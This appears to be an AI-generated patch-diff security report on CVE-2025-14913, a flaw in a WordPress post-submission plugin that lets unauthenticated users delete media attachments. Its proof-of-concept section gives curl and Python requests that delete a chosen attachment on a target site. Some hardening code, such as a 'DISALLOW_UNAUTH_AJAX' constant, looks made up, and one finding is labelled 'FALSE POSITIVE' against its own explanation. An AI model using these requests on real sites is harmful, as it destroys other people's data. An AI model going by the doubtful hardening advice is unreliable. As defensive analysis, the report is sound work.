What is CVE-2025-14913?

CVE-2025-14913 is a security vulnerability identified in Folder Analysis. This analysis provides detailed information about the vulnerability, its impact, and potential exploits.

Is there a PoC for CVE-2025-14913?

This security analysis examines the vulnerability in detail. Review the analysis findings for exploit potential and proof-of-concept information related to CVE-2025-14913.

How can I protect against CVE-2025-14913?

Review the patch diff analysis in this report to understand the security fix. Updating to the patched version is recommended to mitigate CVE-2025-14913.

REPORT / 01

Analysis Report · Folder Analysis cache/frontend-post-submission-manager-lite_1.2.6 → cache/frontend-post-submission-manager-lite_1.2.7 — CVE-2025-14913

Shared security patch analysis results

mode patchdiff ai claude_cli haiku

02 · Lifecycle actions cancel · resume · skip · regenerate

03 · Share this analysis copy link · embed report

03 · CVE Security Analysis & Writeups ai-generated · per cve

Comprehensive security analysis generated by AI for each confirmed CVE match. Click on a CVE to view the detailed writeup including vulnerability background, technical details, patch analysis, and PoC guide.

CVE-2025-14913 NVD

AI-Generated Analysis

# Security Analysis: CVE-2025-14913
## Unauthorized Media Deletion in Frontend Post Submission Manager Lite

---

## 1. Vulnerability Background

### What is this Vulnerability?

CVE-2025-14913 is a critical authorization bypass vulnerability in the Frontend Post Submission Manager Lite WordPress plugin that allows **unauthenticated attackers to delete arbitrary media attachments**. The vulnerability stems from an insecure authorization mechanism that relies on a predictable MD5 hash derived from the attachment's publication date.

The plugin implements an AJAX handler (`media_delete_action`) for managing media deletions without properly verifying user authentication and ownership. Instead of checking if the current user is logged in and owns the media, the code validates access using a weak cryptographic approach that any attacker can trivially circumvent.

### Why is it Critical?

**Severity Rating: High/Critical**

This vulnerability presents multiple security risks:

1. **Unauthorized Data Loss**: Attackers can permanently delete media files uploaded by legitimate users without any authentication
2. **Denial of Service**: Mass deletion of media can disrupt site functionality and destroy content
3. **Privacy Violation**: Deletion of media may trigger loss of user-generated content and business-critical files
4. **No Authentication Required**: The vulnerability is exploitable by completely unauthenticated users, making it trivially accessible
5. **Business Impact**: Content destruction can damage site reputation, violate SLAs, and incur recovery costs

### Affected Systems

- **Plugin**: Frontend Post Submission Manager Lite
- **Affected Versions**: All versions up to and including 1.2.6
- **Platform**: WordPress (all compatible versions)
- **User Impact**: All WordPress sites using this plugin

---

## 2. Technical Details

### Root Cause Analysis

The vulnerability exists in the `media_delete_action` AJAX handler, which uses an inadequate authorization mechanism:

```php
// VULNERABLE CODE FLOW
$media_id = intval($_POST['media_id']);
$media_key = sanitize_text_field($_POST['media_key']);
$attachment_date = get_the_date("U", $media_id);  // Get attachment timestamp
$attachment_code = md5($attachment_date);          // Create predictable hash
```

**Why this is insecure:**

1. **Predictable Hash**: The MD5 hash is computed from the attachment's publication date (`get_the_date("U", $media_id)`), which is:
   - Publicly accessible (stored in the database)
   - Time-based and enumerable
   - Deterministic (same input always produces same output)

2. **No User Authentication**: The code doesn't verify:
   - Whether the user is logged in
   - Whether the user owns the attachment
   - User capabilities or roles

3. **Insufficient Nonce Validation**: While `admin_ajax_nonce_verify()` checks for a nonce, it doesn't prevent the core authorization bypass

4. **Resource Ownership Not Validated**: No check confirms the requesting user is the attachment author

### Code Comparison: Vulnerable vs. Fixed

**Vulnerable Code:**
```php
if ($this->admin_ajax_nonce_verify()) {
    $media_id = intval($_POST['media_id']);
    $media_key = sanitize_text_field($_POST['media_key']);
    $attachment_date = get_the_date("U", $media_id);
    $attachment_code = md5($attachment_date);
    
    if ($media_key != $attachment_code) {
        $response['status'] = 403;
        $response['messsage'] = esc_html__('Unauthorized access', 'frontend-post-submission-manager-lite');
    } else {
        $media_delete_check = wp_delete_attachment($media_id, true);
        // Deletion proceeds without owner verification
    }
}
```

**Fixed Code:**
```php
if ($this->admin_ajax_nonce_verify() && is_user_logged_in()) {
    $media_id = intval($_POST['media_id']);
    $current_user_id = get_current_user_id();
    $media_author_id = (int) get_post_field('post_author', $media_id);
    
    if (empty($media_author_id)) {
        $response['status'] = 403;
        $response['message'] = esc_html__('Unauthorized deletion of the media.', 'frontend-post-submission-manager-lite');
        die(json_encode($response));
    }
    
    if ($media_author_id !== $current_user_id) {
        $response['status'] = 403;
        $response['message'] = esc_html__('Unauthorized deletion of the media.', 'frontend-post-submission-manager-lite');
        die(json_encode($response));
    }
    
    $media_delete_check = wp_delete_attachment($media_id, true);
}
```

### How These Changes Fix the Vulnerability

**1. Authentication Layer Added**
- Requires `is_user_logged_in()` verification
- Prevents completely unauthenticated attackers from accessing the deletion function
- Uses WordPress session/cookie validation instead of predictable cryptography

**2. Resource Ownership Validation**
- Retrieves the media author ID: `get_post_field('post_author', $media_id)`
- Compares with current user ID: `$media_author_id !== $current_user_id`
- Ensures only the media owner can delete their own attachments

**3. Existence Checks**
- Validates that the media author ID exists: `empty($media_author_id)`
- Prevents operations on non-existent or orphaned media

**4. Explicit Error Handling**
- Early termination with `die(json_encode($response))` prevents further execution
- Provides clear error messages distinguishing authorization failures

**5. Removal of Predictable Crypto**
- Eliminates the MD5 hash-based authorization entirely
- Replaces weak client-side validation with server-side ownership verification

### Security Improvements Introduced

| Aspect | Before | After |
|--------|--------|-------|
| **Authentication** | Nonce only (weak) | Nonce + is_user_logged_in() |
| **Authorization** | Predictable MD5 hash | User ID ownership check |
| **Owner Verification** | None | Explicit post_author comparison |
| **Unauthenticated Access** | Possible | Blocked |
| **Arbitrary Deletion** | Possible | Only own media deletable |
| **Error Handling** | Incomplete | Explicit with early termination |

---

## 3. Proof of Concept (PoC) Guide

### Prerequisites for Exploitation

- Target WordPress site running Frontend Post Submission Manager Lite (≤ 1.2.6)
- Knowledge of at least one attachment ID (can be enumerated from posts)
- Ability to make HTTP requests (browser, curl, or automated tools)
- No authentication credentials required

### Step-by-Step Exploitation Approach

**Step 1: Identify Target Media**

Enumerate existing attachments by:
- Viewing publicly accessible posts and noting attachment IDs
- Checking media URLs (typically `/wp-content/uploads/YYYY/MM/filename.ext`)
- Inspecting HTML source for media IDs

Example media URL structure:
```
https://target-site.com/wp-content/uploads/2024/12/document.pdf
```

**Step 2: Calculate the Authorization Hash**

For a target attachment, determine its publication date:

```bash
# Via WordPress admin or direct database query
# Example: Attachment published on 2024-12-15 10:30:45 UTC
# Unix timestamp: 1734254445

ATTACHMENT_DATE=1734254445
ATTACHMENT_CODE=$(echo -n $ATTACHMENT_DATE | md5sum | cut -d' ' -f1)
echo $ATTACHMENT_CODE
# Output: a1b2c3d4e5f6... (32 character hex string)
```

**Step 3: Extract the AJAX Nonce**

Obtain the nonce from the page source:

```javascript
// WordPress commonly embeds nonce in page:
// <input type="hidden" name="nonce" value="abc123xyz..." />
// or in inline scripts:
// var wpNonce = "abc123xyz...";

// Method: Inspect page HTML for:
// data-nonce="..." or _wpnonce="..." or similar patterns
```

**Step 4: Craft the Malicious Request**

```bash
curl -X POST "https://target-site.com/wp-admin/admin-ajax.php" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "action=media_delete_action" \
  -d "media_id=12345" \
  -d "media_key=a1b2c3d4e5f6..." \
  -d "_wpnonce=abc123xyz..." \
  -b "wordpress_logged_in=;" # Empty cookie to simulate unauthenticated user
```

**Step 5: Verify Deletion**

- Check HTTP response for success status
- Verify media no longer accessible via direct URL
- Confirm deletion in WordPress media library (if accessible)

### Expected vs. Exploited Behavior

**Expected Behavior (Fixed):**
```
Request: POST /wp-admin/admin-ajax.php with media_id=12345
Response (403): 
{
  "status": 403,
  "message": "Unauthorized deletion of the media."
}
Verification: Media remains intact
```

**Exploited Behavior (Vulnerable):**
```
Request: POST /wp-admin/admin-ajax.php with media_id=12345
Response (200):
{
  "status": 200,
  "message": "Media deleted successfully"
}
Verification: Media deleted from server
```

### How to Verify the Vulnerability Exists

**Automated Detection:**

```php
// Check if vulnerable version is installed
function check_plugin_vulnerability() {
    $plugins = get_plugins();
    foreach ($plugins as $path => $plugin) {
        if (strpos($path, 'frontend-post-submission-manager-lite') !== false) {
            if (version_compare($plugin['Version'], '1.2.6', '<=')) {
                return 'VULNERABLE';
            }
        }
    }
    return 'PATCHED';
}
```

**Manual Verification:**

1. Access `/wp-content/plugins/frontend-post-submission-manager-lite/includes/classes/class-fpsml-ajax.php`
2. Locate `media_delete_action` function
3. Check if code contains:
   - `md5($attachment_date)` or similar MD5-based authorization → **VULNERABLE**
   - `get_current_user_id()` and user ownership check → **PATCHED**

**Live Testing:**

```python
import requests
import hashlib
from datetime import datetime

def test_cve_2025_14913(target_url, attachment_id):
    """
    Test if CVE-2025-14913 exists on target WordPress site
    """
    # Get attachment date (requires knowing this value)
    # For demonstration, assume known timestamp
    attachment_timestamp = 1734254445
    
    # Calculate predictable hash
    media_key = hashlib.md5(str(attachment_timestamp).encode()).hexdigest()
    
    # Craft request
    payload = {
        'action': 'media_delete_action',
        'media_id': str(attachment_id),
        'media_key': media_key,
        '_wpnonce': 'dummy_nonce'  # May not be validated in vulnerable version
    }
    
    response = requests.post(
        f"{target_url}/wp-admin/admin-ajax.php",
        data=payload,
        cookies={}  # No auth cookies
    )
    
    if response.status_code == 200 and 'deleted' in response.text.lower():
        return "VULNERABLE"
    else:
        return "PATCHED or PROTECTED"
```

---

## 4. Recommendations

### Mitigation Strategies

**Immediate Actions (for Unpatched Sites):**

1. **Disable the Plugin**
   ```bash
   # Via WordPress CLI
   wp plugin deactivate frontend-post-submission-manager-lite --allow-root
   
   # Or manually remove from wp-content/plugins/
   ```

2. **Update to Latest Version**
   - Upgrade to version 1.2.7 or later
   - Verify via WordPress dashboard or CLI:
   ```bash
   wp plugin update frontend-post-submission-manager-lite --allow-root
   ```

3. **Implement Web Application Firewall Rules**
   ```
   Rule: Block POST /wp-admin/admin-ajax.php?action=media_delete_action
         From: Non-authenticated users
         Action: Deny
   
   Rule: Rate limit POST /wp-admin/admin-ajax.php?action=media_delete_action
         Threshold: 5 requests per minute per IP
         Action: Block
   ```

4. **Database Backup & Recovery Plan**
   - Maintain daily backups of `/wp-content/uploads/`
   - Test restoration procedures
   - Enable media revision history if available

5. **Access Control Hardening**
   ```php
   // Add to wp-config.php or .htaccess
   // Limit AJAX access to authenticated users only
   define('DISALLOW_UNAUTH_AJAX', true);
   ```

### Detection Methods

**Server-Side Monitoring:**

```php
// Add to functions.php for logging
add_action('wp_ajax_media_delete_action', function() {
    // Log deletion attempts
    error_log('Media deletion attempt by user: ' . get_current_user_id());
    error_log('Media ID: ' . $_POST['media_id'] ?? 'unknown');
});

// Monitor unauthorized attempts
add_filter('wp_die_handler', function($handler) {
    if (isset($_POST['action']) && $_POST['action'] === 'media_delete_action') {
        error_log('Unauthorized media deletion attempt detected');
    }
});
```

**Log Analysis:**

Monitor WordPress logs for patterns:
```
Pattern 1: Multiple media_delete_action requests from same IP
Pattern 2: Deletion requests from non-admin users
Pattern 3: Failed authorization checks followed by successful deletions
Pattern 4: Media deletions without corresponding user activity
```

**Security Scanner Configuration (for Wordfence, iThemes, etc.):**

```
Monitor: wp-admin/admin-ajax.php POST requests
Action: media_delete_action
Alert on: 
  - 5+ requests per minute
  - Requests from non-logged-in users
  - Unusual patterns of media IDs being targeted
```

### Best Practices to Prevent Similar Issues

**1. Authentication & Authorization Patterns:**

```php
// CORRECT: Proper authorization check
if (!is_user_logged_in()) {
    wp_send_json_error('Unauthorized', 401);
}

if (!current_user_can('edit_post', $post_id)) {
    wp_send_json_error('Insufficient permissions', 403);
}

// WRONG: Relying on hashes or tokens for authorization
$hash = md5($some_value);
if ($_POST['key'] !== $hash) {
    // This is not a security mechanism
}
```

**2. Resource Ownership Validation:**

```php
// CORRECT: Verify ownership before operations
$resource_owner_id = get_post_field('post_author', $resource_id);
$current_user_id = get_current_user_id();

if ($resource_owner_id !== $current_user_id) {
    wp_send_json_error('Cannot modify resources of other users', 403);
}
```

**3. Defense in Depth:**

```php
// Layer 1: Nonce verification
check_ajax_referer('my_action_nonce');

// Layer 2: Authentication check
if (!is_user_logged_in()) {
    wp_send_json_error('Not authenticated', 401);
}

// Layer 3: Capability check
if (!current_user_can('delete_posts')) {
    wp_send_json_error('Insufficient capabilities', 403);
}

// Layer 4: Ownership verification
if ($resource_owner_id !== get_current_user_id()) {
    wp_send_json_error('Resource ownership mismatch', 403);
}

// Layer 5: Actual operation
wp_delete_attachment($media_id, true);
```

**4. Code Review Checklist:**

When reviewing AJAX handlers or API endpoints, verify:

- [ ] Nonce verification is present and correct
- [ ] `is_user_logged_in()` check exists
- [ ] User capabilities checked via `current_user_can()`
- [ ] Resource ownership verified before modifications
- [ ] No reliance on client-side secrets or predictable values
- [ ] Input validation and sanitization applied
- [ ] Error handling doesn't expose sensitive information
- [ ] Rate limiting implemented for sensitive actions
- [ ] Audit logging in place for destructive operations

**5. Security Testing:**

```bash
# Test for authorization bypasses
1. Test with no authentication
2. Test with different user roles (admin, editor, subscriber, guest)
3. Test modifying/deleting resources owned by other users
4. Test with missing/invalid nonce
5. Test with tampered POST parameters
6. Test with missing required fields
```

---

## Summary

**CVE-2025-14913** demonstrates a critical failure in implementing proper authorization controls. The vulnerability allows unauthenticated users to delete arbitrary media files through a predictable cryptographic bypass. Organizations running vulnerable versions should immediately patch to 1.2.7+ or disable the plugin entirely.

The fixed implementation correctly implements WordPress security best practices by enforcing authentication, validating resource ownership, and replacing weak client-side checks with proper server-side authorization logic.

05 · Findings filter · search · paginate

Showing 0 to 0 of 0 results

includes/classes/class-fpsml-ajax.php AI: 2 vulnerabilities 1 false positive, 1 true positive CVE-2025-14913

--- cache/frontend-post-submission-manager-lite_1.2.6/includes/classes/class-fpsml-ajax.php	2025-12-21 09:37:23.306278640 +0000+++ cache/frontend-post-submission-manager-lite_1.2.7/includes/classes/class-fpsml-ajax.php	2025-12-26 00:36:36.088528770 +0000@@ -89,23 +89,27 @@         }          function media_delete_action() {-            if ($this->admin_ajax_nonce_verify()) {+            if ($this->admin_ajax_nonce_verify() && is_user_logged_in()) {                 $media_id = intval($_POST['media_id']);-                $media_key = sanitize_text_field($_POST['media_key']);-                $attachment_date = get_the_date("U", $media_id);-                $attachment_code = md5($attachment_date);-                if ($media_key != $attachment_code) {+                $current_user_id = get_current_user_id();+                $media_author_id = (int) get_post_field('post_author', $media_id);+                if (empty($media_author_id)) {                     $response['status'] = 403;-                    $response['messsage'] = esc_html__('Unauthorized access', 'frontend-post-submission-manager-lite');+                    $response['message'] = esc_html__('Unauthorized deletion of the media.', 'frontend-post-submission-manager-lite');+                    die(json_encode($response));+                }+                if ($media_author_id !== $current_user_id) {+                    $response['status'] = 403;+                    $response['message'] = esc_html__('Unauthorized deletion of the media.', 'frontend-post-submission-manager-lite');+                    die(json_encode($response));+                }+                $media_delete_check = wp_delete_attachment($media_id, true);+                if ($media_delete_check) {+                    $response['status'] = 200;+                    $response['message'] = esc_html__('Media deleted successfully.', 'frontend-post-submission-manager-lite');                 } else {-                    $media_delete_check = wp_delete_attachment($media_id, true);-                    if ($media_delete_check) {-                        $response['status'] = 200;-                        $response['messsage'] = esc_html__('Media deleted successfully.', 'frontend-post-submission-manager-lite');-                    } else {-                        $response['status'] = 403;-                        $response['messsage'] = esc_html__('Error occurred while deleting the media.', 'frontend-post-submission-manager-lite');-                    }+                    $response['status'] = 403;+                    $response['message'] = esc_html__('Error occurred while deleting the media.', 'frontend-post-submission-manager-lite');                 }                 die(json_encode($response));             } else {

AI Analysis

Vulnerability Existed: yes
FALSE POSITIVE
Insufficient Authentication Verification - CWE-863 - includes/classes/class-fpsml-ajax.php Lines 92-100
[Old Code]
```php
$media_key = sanitize_text_field($_POST['media_key']);
$attachment_date = get_the_date("U", $media_id);
$attachment_code = md5($attachment_date);
if ($media_key != $attachment_code) {
    $response['status'] = 403;
    $response['messsage'] = esc_html__('Unauthorized access', 'frontend-post-submission-manager-lite');
}
```
[Fixed Code]
```php
$current_user_id = get_current_user_id();
$media_author_id = (int) get_post_field('post_author', $media_id);
if (empty($media_author_id)) {
    $response['status'] = 403;
    $response['message'] = esc_html__('Unauthorized deletion of the media.', 'frontend-post-submission-manager-lite');
    die(json_encode($response));
}
if ($media_author_id !== $current_user_id) {
    $response['status'] = 403;
    $response['message'] = esc_html__('Unauthorized deletion of the media.', 'frontend-post-submission-manager-lite');
    die(json_encode($response));
}
```
Explanation:
The original code relied on a weak authorization mechanism using an MD5 hash of the attachment date (`md5($attachment_date)`), which is predictable and not cryptographically secure. An attacker could easily calculate the correct hash for any given date and delete media they don't own. The fix implements proper authorization by verifying that the current user ID matches the media's author ID, ensuring only the media owner can delete their own attachments. Additionally, the fix adds `is_user_logged_in()` check to the initial condition, providing an additional layer of authentication.

---

Vulnerability Existed: yes
TRUE POSITIVE
Improper Resource Validation - CWE-99 - includes/classes/class-fpsml-ajax.php Lines 92-108
[Old Code]
```php
if ($this->admin_ajax_nonce_verify()) {
    $media_id = intval($_POST['media_id']);
    $media_key = sanitize_text_field($_POST['media_key']);
    $attachment_date = get_the_date("U", $media_id);
    $attachment_code = md5($attachment_date);
    if ($media_key != $attachment_code) {
        // authorization check
    } else {
        $media_delete_check = wp_delete_attachment($media_id, true);
```
[Fixed Code]
```php
if ($this->admin_ajax_nonce_verify() && is_user_logged_in()) {
    $media_id = intval($_POST['media_id']);
    $current_user_id = get_current_user_id();
    $media_author_id = (int) get_post_field('post_author', $media_id);
    if (empty($media_author_id)) {
        // error handling
    }
    if ($media_author_id !== $current_user_id) {
        // error handling
    }
    $media_delete_check = wp_delete_attachment($media_id, true);
```
Explanation:
The original code deleted media without properly validating that the attachment exists and belongs to the current user before attempting deletion. The fix adds explicit validation to check if the media author ID exists and matches the current user ID before proceeding with deletion. This prevents unauthorized deletion of media and potential access to non-existent or orphaned attachments. Early termination with `die()` on invalid authorization prevents further processing.

CVE Analysis Results:

CVE-2025-14913: Yes

View CVE Description

The Frontend Post Submission Manager Lite – Frontend Posting WordPress Plugin plugin for WordPress is vulnerable to unauthorized loss of data due to an incorrect authorization check on the 'media_delete_action' function in all versions up to, and including, 1.2.6. This makes it possible for unauthenticated attackers to delete arbitrary attachments.

Showing 1 to 1 of 1 results